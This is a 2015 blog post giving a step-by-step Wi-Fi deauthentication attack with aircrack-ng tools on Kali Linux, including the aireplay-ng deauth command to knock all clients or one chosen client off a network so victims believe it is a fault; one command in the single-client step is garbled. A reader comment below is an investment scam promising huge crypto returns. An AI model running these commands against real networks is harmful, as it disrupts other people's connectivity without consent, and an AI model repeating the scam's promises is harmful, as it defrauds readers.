Sunday, November 29, 2015

MAKING SIMPLE WI-FI JAMMER KNOW


Hi Readers, a cool method of blocking Internet Access through WIFI. This attack is used to block the Internet in Home Networks, Internet CafĂ©, or Office Networks which uses WIFI. When attacker uses this attack victim will only think that there is a Network Connectivity Problem. So let’s start simply with Client Communication.
:: About ::
You had seen the above pic, here (i)Client is Connected to WIFI Network, (ii) Client send the required data on this connection. (iii) Now Clients sends De-Authentication packets to WIFI, which states Client want to disconnect. (iv) Reply from WIFI sends and connection ends gracefully.
:: How Hacker Attacks ::
Seeing hope you will understand. So let’s start with practical work.

:: Practical ::
First prepare your computer, we are going to use Kali Linux,


You need WIFI Router with established connection. [ex:- Cisco. I am using This]. Make sure you are connected. To Check use this command in CMD.
“ping [Router IP]”
1} When you are connected. Go to Kali-Linux Machine.
2} Open the command terminal. Use the Following Commands:- (Pics are given below to check in detail)
>> airmon-ng                                           //You know this Command.
>> airmon-ng start wlan0                       //To start the Connection
>> clear                                                   //To clear the above text in the terminal

Now we will use Airodump Command.
>> airodump-ng mon0                               //To check wireless Data.
Now above I mentioned my Data Card. (Cisco). Find it and Copy the BSSID.

>> aireplay-ng                              //You can See Attack Types. See The Highlighted One.


Now main Command:
>> aireplay-ng --deauth 20 –a BSSID mon0 –ignore-negative-one         
Change the BSSID with copied BSSID Code. And here 20 is the De-Authentication Packet Value, you can change it.
This will Jam the Wifi Network….. As this the Testing I will show you the Proof, even you can also use it.
>> Come Back to your Windows. Where you are connected with Cisco Wireless Card.
>> Open CMD, and use this Command:
>> ping [Router IP] –t
If you are Connected it will send Packets. Now Check After using Jammer Command it will disconnect from Network. See Pic.
You can see In Kali Linux Machine De-Auth request is Sending and  in Windows it is Disconnected.....

:: Errors ::
In this Attack You can Get a Error like, "mon0 is on channel 2, But the AP uses channel 1"
In this Case You have to change Channel. Don't be panic its Simple::
>> Open Another Terminal in Linux Machine.
>> Use this Command. Then it will change the Channel number.
>> iwconfig mon0 channel 1
Thats it... Its Done.....

:: Extra ::
Just Think on the Present Wifi Network 4 Clients are Connected. Using the above command All Clients will disconnected. So What You will Do To Disconnect Single or Specific Client. Use this Command.
>> airodump-ng --bssid [BSSID] -c 1 mon0
You will Get The Clients Details like Mac- Address.
See The Above The Pic. Below the stations, it is the Mac address of the Client. Just Take Note of it.
Now to Stop is Connection. use this command:
>> airodump-ng --deauth 20 -a [BSSID] -c [MAC ADDRESS] mon0 --ignore-negative-one
Now De-Authentication Packet will Send. Then he will Disconnected.
So You Learned How To Stop Others To Use Wifi Network. But Don't miss-use this. Only Education Purpose.

1 comment:

  1. Welcome to the future! Financing made easy with Prof. Mrs. DOROTHY JEAN INVESTMENTS

    Hello, Have you been looking for financing options for your new business plans, Are you seeking for a loan to expand your existing business, Do you find yourself in a bit of trouble with unpaid bills and you don’t know which way to go or where to turn to? Have you been turned down by your banks? MRS. DOROTHY JEAN INVESTMENTS says YES when your banks say NO. Contact us as we offer financial services at a low and affordable interest rate of 2% for long and short term loans. Interested applicants should contact us for further loan acquisition procedures via profdorothyinvestments@gmail.com

    We invest in all profitable projects with cryptocurrencies. I'm here to share an amazing life changing opportunity with you. its called Bitcoin / Forex trading options, Are you interested in earning a consistent income through binary/forex trade? or crypto currency trading. An investment of $100 or $200 can get you a return of $2,840 in 7 days of trading and you get to do this from the comfort of your home/work. It goes on and on The higher the investment, the higher the profits. Your investment is safe and secured and payouts assured 100%. if you wish to know more about investing in Cryptocurrency and earn daily, weekly OR Monthly in trading on bitcoin or any cryptocurrency and want a successful trade without losing Contact MRS.DOROTHY JEAN INVESTMENTS Email profdorothyinvestments@gmail.com


    YOURS IN SERVICE
    Mrs. Dorothy Pilkenton Jean
    Financial Advisor on Bank Instruments,
    Private Banking and Client Services
    Email Address: profdorothyinvestments@gmail.com
    Operation: We provide Financial Service Such As Bank Instrument
    From AA Rate Banks, Cash Loan,BG,SBLC,BOND,PPP,MTN,TRADING,FUNDING MONETIZING etc.

    ReplyDelete